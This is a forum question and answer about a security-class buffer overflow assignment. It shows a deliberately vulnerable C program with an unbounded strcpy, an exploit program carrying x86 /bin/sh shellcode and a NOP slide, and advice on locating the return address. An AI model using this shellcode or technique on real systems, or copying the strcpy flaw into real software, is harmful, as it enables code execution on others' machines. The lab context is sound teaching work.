cbuffer-overflowshellcodestack-smashfortify-source

Buffer Overflow as homeowrk


Still learning this Buffer Overflow stuff for a security class, I'm trying to exploit the vulnerability in this application:

//vuln.c
#include <stdio.h>

int bof(char *str)
{
     char buffer[12];

     //BO Vulnerability
     strcpy(buffer,str);

     return 1;
}

int main(int argc, char* argv[])
{
     char str[517];

     FILE *badfile;
         badfile = fopen("badfile","r");

     fread(str, sizeof(char),517, badfile);
     bof(str);

     printf("Returned Properly\n");
     return 1;
}

Using this exploit application:

//exploit.c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

const char code[] =
"\x31\xc0"
"\x50"
"\x68""//sh"
"\x68""/bin"
"\x89\xe3"
"\x50"
"\x53"
"\x89\xe1"
"\x99"
"\xb0\x0b"
"\xcd\x80"
;


int main(int argc, char* argv[])
{
    char buffer[517];
    char large_string[512];
    FILE *badfile;
        badfile = fopen("./badfile", "w");

    //NOPslide
    memset(&buffer,0x90,517);

    //BEGIN FILL BUFFER
         //from stack_smashing.pdf
    long *long_ptr = (long *) large_string;

    int i;
    for (i = 0; i < 128; i++) 
        *(long_ptr + i) = (int) buffer;

    for (i = 100; i < strlen(code)+100; i++) 
        large_string[i] = code[i];

    strcpy(buffer,large_string);
    //END FILL BUFFER

    //save buffer to badfile
    fwrite(buffer,517,1,badfile);
    fclose(badfile);

    return 0;
}

For some reason, when I create the badfile by running exploit, it doesn't push anything to it. Either the buffer is empty or it's not writing properly. I can't seem to find my error, and after tirelessly google searching, I wasn't able to find a sufficient answer. From my understanding of the Fill Buffer Code I used, this should fill long_string with the address of my buffer, then put my shellcode at the beginning of long_string (after a bit of a NOOP slide) and then copy long_string back to buffer. I don't really see any issue with this or with the fwrite. Suggestions?


Solution

  • Well, you need to understand what smashing the stack really accomplishes. It basically smashes a lot of values and overwrites a particular address which is basically the address of the return pointer on the stack ($ebp + 4). You are definitely trying to smash the stack but there is tons of stuff you have to do in order to understand exactly what address you need to override with another address that points to your shellcode.

    http://www.phrack.com/issues.html?issue=49&id=14

    Currently you don't have the working of either of those two things.

    You should use gdb or may another tool to go through the assembly code of the actual vulnerable code and see the return address. Based on that, you try to smash the stack using the command line.

    Then you run your exploit code without smashing the stack. Try to capture the actual return address which you should be pointing to the place where you plant your shellcode.

    You should follow the reading on phrack to actually understand the concept of smashing the stack. Hope that helps!